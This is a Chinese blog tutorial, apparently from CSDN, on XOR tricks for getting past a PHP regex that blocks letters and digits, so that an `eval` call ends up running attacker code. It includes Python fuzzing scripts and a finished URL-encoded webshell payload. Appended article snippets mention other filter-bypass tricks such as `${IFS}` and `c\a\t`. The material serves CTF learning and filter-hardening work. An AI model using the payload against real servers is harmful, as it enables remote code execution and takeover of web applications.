php常用绕正则姿势

最新推荐文章于 2025-05-18 17:24:53 发布
原创 最新推荐文章于 2025-05-18 17:24:53 发布 · 1k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#正则表达式 #正则 #php 正则表达式 思维导图

本文介绍了如何使用异或绕过正则表达式的限制,以构造类似于`eval($_POST['shell'])`的PHP语句。通过示例和脚本演示了如何寻找可以异或成特定字母的字符,利用不可见字符进行URL编码,从而达成正则匹配的规避。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

异或绕过

接上篇正则表达式,如果出现这样的正则:

if (!preg_match('/[a-z 0-9]/is',$_GET['a'])) {
	eval($_GET['a']);	
}
else{
	echo "hacker"}

即get传参的a变量中不能有数字和字母,但如果想拿到shell就要传入类似eval($_POST[‘shell’])的语句,但这时字母被禁,只能通过其他方式来构造类似的语句,这里就可以用异或规则来绕过。

先介绍下什么是异或,举个例子:

字符:?         ASCII码:63           二进制:  00‭11 1111‬
字符:~         ASCII码:126          二进制:  0111 1110‬
异或规则:
1   XOR   0   =   1
0   XOR   1   =   1
0   XOR   0   =   0
1   XOR   1   =   0
上述两个字符异或得到 二进制:  0100 0001
该二进制的十进制也就是:65
对应的ASCII码是:A

但如何构造eval($_POST[‘shell’])呢?
这里写了个脚本fuzz一下:

#-*-coding:utf-8-*-
def xor():
    for i in range(0,127):
        for j in range(0,127):
            result=i^j
            print("字符:"+chr(i)+" ASCII码值为:"+str(i)+"异或"+"字符:"+chr(j)+" ASCII码值为:"+str(j)+" == ""字符:"+chr(result)+" ASCII码值为:"+str(result))
if __name__=="__main__":
    xor()

运行结果如下:
在这里插入图片描述
构造payload:
贴段代码,用来查找哪两个字符可以异或成对应的字母

#-*-coding:utf-8-*-
def xor():
    for i in range(0,127):
        for j in range(0,127):
            result=i^j
            if chr(result)=="v":
                print("字符:"+chr(i)+" ASCII码值为:"+str(i)+"异或"+"字符:"+chr(j)+" ASCII码值为:"+str(j)+" == ""字符:"+chr(result)+" ASCII码值为:"+str(result))
if __name__=="__main__":
    xor()

找如下图类似的两个字符在这里插入图片描述

<?php
$a=(''^'`').(''^'`').(''^'`').(''^'`');
echo $a;
$b='_'.(''^'[').('/'^'`').(''^'[').('	'^']');
echo $b;
//$c=$$b;
//echo $c;
//echo $a($c[_]);
?>

不可见字符,可以用url编码代替
构造的payload如下:

$a=('%05'^'`').('%16'^'`').('%01'^'`').('%0C'^'`');$b='_'.('%0D'^'[').('%2F'^'`').('%0E'^'[').('%09'^']');$c=$$b;$a($c[_]);

后面有时间再写QAQ

2hwh0
关注
PHP弱类型及一些绕过姿势
Lemon's blog
04-30 5972
前言: 做web题时经常会遇到各种php弱类型或者是php的一些漏洞函数,由于知识比较零碎,就总结一下我所遇到的,也方便自己以后观看。 0x01:Hash比较缺陷 产生原因: PHP在处理哈希字符串时,通过!=或==来对哈希值进行比较,它把每一个以0e开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以0e开头的,那么PHP将会认为他们相同,都是0 具体实例: 审计代码,我...
上传绕过php文件改为图片,文件上传漏洞另类绕过技巧及挖掘案例全汇总
weixin_28744601的博客
03-12 1587
文件上传漏洞作为获取服务器权限最快的方式,虽然相关资料很多,但很多人对上传校验方式、如何针对性绕过检测、哪种上传和解析的场景会产生危害等还是比较模糊。本文作一些阐述,然后补充一些除了上传webshell的其他非常规挖掘姿势,包括XSS、重定向、Dos、CSRF等等。1、基础知识:要深入了解文件上传,必须了解上传属性、常见文件的结构、图形处理函数等内容。1)报文特点:观察文件上传报文的特点:Hea...
php正则绕过
Hammers_12的博客
09-07 1882
一、空格正则绕过: ${IFS} 但不能写作 $IFS $IFS$9 %09 <> < 二、 在PHP中,在正则绕过时可以利用\包裹住被过滤的函数,以此达到绕过的目的。例如: cat 进黑名单,用 c\a\t 绕过 空格进黑名单,用 ${IFS} 或者 %09 绕过 ✳ 和 flag 都被过滤,用和 ✳ 差不多的 ? 绕过,即 ???,获取四位的 flag ...
php 绕过 正则,Bugku | 数字验证正则绕过
weixin_28949937的博客
03-23 409
语法:int preg_match_all (字符串$ pattern ,字符串$ subject [,数组和$ matches [,整数$ flags = PREG_PATTERN_ORDER [,整数$ offset = 0 ]]] )搜索主题中所有匹配模式给定正则表达式的匹配结果并将它们以标志指定顺序输出到匹配中。在第一个匹配找到后,子序列继续从最后一次匹配位置搜索。参数说明:$ patte...
php正则取反绕过和异或绕过
最新发布
lubai60060的博客
05-18 960
​ 当字母和数字被过滤,但是下划线没有被过滤的时候,我们就可以考虑使用异或绕过正则表达式的匹配。
【Flag】-PHP-正则绕过
soldi_er的博客
09-02 2563
文章目录【RCTF2020】calc通用字符集合正则字符替换[a-z]落脚函数参考 最近RCTF分站赛要开始了,梳理一些知识。 【RCTF2020】calc 主要check源码如下 $str = $_GET['num']; $blacklist = ['[a-z]', '[\x7f-\xff]', '\s',"'", '"', "`", '\[', "\]","\$", '_', "\\\\",'\^', ","]; foreach ($blacklist as $blackitem) {
php绕过正则表达式,关于php:通过跳过锚标记来检查正则表达式
weixin_42151305的博客
03-27 360
我已经写了一个用于搜索特定关键字的正则表达式,并用特定的URL替换了该关键字。我当前的正则表达式为:\b$keyword\b其中的一个问题是,如果我的数据包含锚标记,而该标记包含此关键字,则此正则表达式也会替换锚标记中的该关键字。我想搜索给定的数据,但锚标记除外。 请帮帮我。 感谢您的帮助。例如。 关键字:迪士尼I / P:This is Disney The disney should be...
命令执行中关于PHP正则表达式的一些绕过方法
qq_45521281的博客
04-21 8938
最近做了buuctf上的[极客大挑战 2019]RCE ME,PHP正则的一些绕过方法也终于要用上了,原文地址:https://blog.csdn.net/mochu7777777/article/details/104631142 参考: https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html https://w...
SQL注入&WAF绕过姿势
热门推荐
4ct10n
03-02 2万+
# 1.WAF过滤机制: 1.异常检测协议–拒绝不符合HTTP标准的请求; 2.增强的输入验证–代理和服务端的验证而不只是限于客户端验证; 3.白名单&黑名单机制–白名单适用于稳定的Web应用,黑名单适合处理已知问题; 4.基于规则和基于异常的保护–基于规则更多的依赖黑名单机制基于,基于异常根据系统异常更为灵活; 5.另外还有会话保护、Cookies保护、抗入侵规避技术、响应监视和信息泄
【文件上传waf绕过练习】
My笔记的博客
06-17 1358
【文件上传waf绕过练习】
SQL黑客注入防御与绕过的多种姿势
sinat_38899493的博客
12-22 2487
一、 PHP几种防御姿势 1. 关闭错误提示 说明: PHP配置文件php.ini中的display_errors=Off,这样就关闭了错误提示。 2. 魔术引号 说明: 当php.ini里的magic_quotes_gpc=On时。提交的变量中所有的单引号(')、双引号(")、反斜线()与 NUL(NULL 字符)会自动转为含有反斜线的转义字符。 魔术引号(Magic Quote)
一些CTF中php可利用的函数和一些正则表达式绕过方法
m0_75066605的博客
03-26 2887
整理的一些CTF中php可利用的函数和一些正则表达式绕过方法
PHP正则绕过解析
qq_56845076的博客
08-03 1491
PHP的回溯,和NULL与False比较
正则回溯php 绕过,PHP利用PCRE回溯次数绕过某些安全限制 | 码农网
weixin_33268205的博客
03-25 442
这次Code-Breaking Puzzles中我出了一道看似很简单的题目 pcrewaf ,将其代码简化如下:function is_php($data){return preg_match('/].*/is', $data);}if(!is_php($input)) {// fwrite($f, $input); ...}大意是判断一下用户输入的内容有没有 PHP 代码,如果没有,则写入文件。...
php 正则 回溯,PHP正则匹配绕过
weixin_33185844的博客
03-10 776
之前没有从机制上去了解过PHP正则匹配绕过具体是怎么一回事,于是主动去网上找了一些资料来加深理解NFA与正则表达式常见的正则引擎,被细分为DFA(确定性有限状态自动机)与NFA(非确定性有限状态自动机)。由于NFA的执行过程存在回溯,所以其性能会劣于DFA,但它支持更多功能。大多数程序语言都使用了NFA作为正则引擎,其中也包括PHP使用的PCRE库。所以这里详细介绍一下NFA(Nondetermi...
php 正则 回溯,preg_match正则最大回溯以及preg_match函数的绕过
weixin_34195649的博客
03-10 1515
先提出一段代码,是i春秋上面的移到ctf题目的代码,也是需要我们绕过的代码:function areyouok($greeting){return preg_match('/Merry.*Christmas/is',$greeting);}$greeting=@$_POST['greeting'];if(!areyouok($greeting)){if(strpos($greeting,'Merr...
php 绕过 正则,数字验证正则绕过
weixin_36372094的博客
03-23 1143
Bugkuctf题库中的一道代码审计题,通过利用各种正则匹配函数特性最终得到flag源代码如下:12345678910111213141516171819202122232425262728293031
php中一些不包含数字和字母的正则绕过
qq_53460654的博客
06-03 1640
php中一些不包含数字和字母的webshell eg: <?php if(preg_match("/[A-Za-z0-9]+/",$code)){ die("NO."); } @eval($code); } 思路: 将我们需要的payload用非字母和数字的字符经过变换得到,然后知道能p
正则表达式的回溯绕过
m0_63521991的博客
08-05 965
正则表达式的回溯绕过是指通过构造恶意输入,使得正则表达式引擎在匹配字符串时产生大量回溯操作,从而导致性能下降甚至造成拒绝服务(DoS)攻击。由于模式中的量词(例如星号*、加号+、问号?、花括号{}等)使得可能有多种不同的匹配方式,导致引擎需要尝试不同的组合,直到找到匹配的结果。这种尝试的过程就称为回溯。回溯操作会导致时间复杂度呈指数级增长,对于复杂的正则表达式和长字符串,性能损失会非常明显。
常用正则表达式大全
在实际应用中,掌握常用正则表达式可以节省大量的时间和提高工作效率。 1. 匹配中文字符的正则表达式:[\u4e00-\u9fa5] 该正则表达式用于匹配 Unicode 码值在 4e00 到 9fa5 之间的中文字符。 2. 匹配双字节字符...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值